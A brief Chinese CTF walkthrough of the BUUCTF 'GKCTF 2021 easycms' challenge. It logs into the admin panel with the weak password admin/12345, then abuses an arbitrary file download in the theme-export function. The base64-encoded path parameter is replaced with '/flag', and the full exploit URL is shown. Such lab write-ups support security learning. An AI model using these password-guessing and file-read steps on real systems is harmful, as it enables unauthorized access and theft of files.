3.【BUUCTF】[GKCTF 2021]easycms
在题目页面查看提示,显示密码是五位弱口令密码
随机点了几个页面
根据提示,在URL后面加admin.php进入后台管理员登陆
尝试五位弱口令密码,试了一下admin/admin显示错误
尝试admin/12345成功登录
利用任意文件下载漏洞
设计→自定义→右上角导出主题→保存
右键复制下载链接
http://e990e85e-73c7-4054-afec-dd1e732a42fb.node5.buuoj.cn:81/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=
看到后面一串应该是base64编码
解码试试 ,可以用这个在线工具base64解码 base64编码 在线base64解码/编码工具 iP138在线工具
/var/www/html/system/tmp/theme/default/1.zip
解码后是文件的绝对路径
尝试改为/flag得到flag
将/flagbase64编码一下
L2ZsYWc=
http://e990e85e-73c7-4054-afec-dd1e732a42fb.node5.buuoj.cn:81/admin.php?m=ui&f=downloadtheme&theme=L2ZsYWc=
用010Editor打开
最后得到flag